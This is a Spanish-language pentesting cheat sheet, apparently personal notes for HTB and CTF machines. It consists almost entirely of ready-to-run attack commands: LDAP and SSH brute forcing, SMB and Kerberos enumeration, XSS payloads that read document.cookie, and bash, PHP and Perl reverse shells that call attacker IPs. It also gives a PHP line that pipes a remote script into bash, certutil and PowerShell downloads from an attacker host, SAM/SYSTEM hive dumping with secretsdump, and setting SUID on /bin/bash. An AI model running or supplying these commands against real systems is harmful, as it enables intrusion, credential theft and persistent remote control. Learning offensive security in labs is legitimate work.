Pentesting tips

Acerca de este post

He creado este post con la intención de tener apuntes para realización de pentesting, consejos y tips para llevar a cabo penetración de sistemas. Está enfocado a la realización de máquinas en plataformas como HTB, CTFs, así como entornos controlados. Está sujeto a cambios, mejoras, etc dependiendo del uso que vaya probando y mis propias preferencias. No añado comentarios para mantenerlo lo más limpio posible.

Nmap

Escanear sistema

nmap -p- -Pn -sSVC 10.129.229.146

Listar scripts

ls /usr/share/nmap/scripts/

Usar script

nmap --script  ftp-vsftpd-backdoor.nse -p 21  10.129.229.146

Exploits

searchsploit 8.1.0-dev

Descubrimientos Windows

Samba Shares

nmap  --script smb-enum-shares -p 445 10.129.229.146
crackmapexec smb dc01.timelapse.htb  --shares -u 'Guest' -p ''  10.129.227.113 
smbclient //dc01.timelapse.htb/Shares -N 

Usuarios smb

nmap --script smb-enum-users.nse -p445 10.129.229.146

Enumearción LDAP

nmap -p 389 --script ldap-brute.nse  10.129.121.110 
nmap -p 389 --script ldap-brute --script-args ldap.base='"dc=baby.vl"' 10.129.121.110
nmap -p 389 --script ldap-brute --script-args 'ldap.base="dc=baby.vl",brute.users=users.txt,brute.pass=/wordlist.txt' 10.129.121.110
ldapsearch -x  -H ldap://10.129.121.110 -b "dc=baby,dc=vl"
ldapsearch -x -b "dc=baby, dc=vl" "(objectClass=person)" -H ldap://10.129.121.110 
ldapsearch -x -b "dc=baby, dc=vl" "(objectClass=user)" -H ldap://10.129.121.110 
nxc ldap baby.vl -u users.txt -p 'BabyStart123!' 10.129.121.110
impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.129.13.155 -no-pass

Descubrimientos web

Curl

curl -i 10.129.28.20 

Fuzzing subdominios

gobuster dns -do nasa.gov -w wordlist/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --delay 400ms

Fuzzing directorios

dirsearch -u http://shocker.htb/

Fuzzing archivos

dirsearch -u https://target.com -e php,html,js,txt,zip,sql -r --delay 1

feroxbuster -u http://shocker.htb//cgi-bin/ -x sh,pl,py,php

Fuzzing path

ffuf -u https://www.example.com/search/?q=FUZZ -w wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt -t 1 -v

XSS

Posible vulnerable headers

Location
Referer
User-Agent
X-Forwarded-For
Host

XSS test

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

hello"><script>alert("hello")</script>
img"><img src/onerror=prompt(document.cookie)>

HTML Injection

marquee"><marquee>hello</marquee>
hello"><u>underline

SQLMap

sqlmap -u "https://target.htb" --random-agent

SSTI

{{ 1/0 }}

Curl

curl -X POST "http://2million.htb/api/v1/invite/verify" -H  "accept: application/json" -d "code=12345678" --cookie 

Payloads

https://github.com/swisskyrepo/PayloadsAllTheThings

Reverse shell

Generador de varias reverseshell https://www.revshells.com/

Bash

sh -i >& /dev/tcp/10.10.14.110/4444 0>&1
bash -c "bash -i >& /dev/tcp/10.10.14.110/4444 0>&1"

Netcat

nc -nlvp 4444

Socat

socat tcp-listen:4444 -

socat file:`tty`,raw,echo=0 tcp-listen:4444

PHP

 <?php system("curl http://10.10.14.70:8000/rev.sh|bash"); ?> 

<?php system(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.166/4444 0>&1′”); ?>

Si no funcionan, prueba con revershell.com a genear un archivo PHP.

Perl

export RHOST=10.10.14.110
export RPORT=4448
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Metasplot SSH

auxiliary/scanner/ssh/ssh_login

Tratamiento TTY

Linux

script /dev/null -c bash

Python

python3 -c 'import pty; pty.spawn("/bin/bash")';
export TERM=xterm

Pulsar Ctrl+Z , esto envía la terminal al background,

stty raw -echo; fg

Volvemos a recuperar la terminal, esto nos permite utilizar Ctrl + C sin que se corte la conexión con la shell. Además tenemos un terminal con capacidades como autocompletado.

Escalada privilegios

Windows

Evil-WinRm

download sam
downlaod system

Descarga de archivos con CMD

certutil -urlcache -split -f https://atacker_ip/malware.py mw.py

Descarga de archivos con PowerShell

Invoke-WebRequest -Uri "https://atackerip/archivo.zip" -OutFile "C:\ruta\destino\archivo.zip"

Impacket-secretsdump

evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> reg save hklm\sam sam
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> reg save hklm\system .\system
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> download sam sam
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> download system system
impacket-secretsdump -sam sam -system system LOCAL

Winpeas

Winpeas.bat

Linux

Sudo

sudo -l 

Find de archivos con el bit SUID activado

find / -perm -u=s -type f 2>/dev/null

Find archivos con permisos de escritura

find /ruta -type f -perm -u=w

Establecer el bit setuid en Bash

chmod u+s /bin/bash

Path hijacking

echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Linpeas

Linpeas.sh

Pspy

https://github.com/DominicBreuker/pspy

Metasploit

Módulo local_exploit_suggester

GTFObins

https://gtfobins.github.io/

Cracking

Hashcat

hashcat -m 3200 hash /usr/share/wordlist/rockyou.txt

samdump2

samdump2 SYSTEM SAM

Brute force

THC-Hydra

hydra -l root -P ~/pentest/wordlist/rockyou.txt  10.10.14.21  ssh -t 4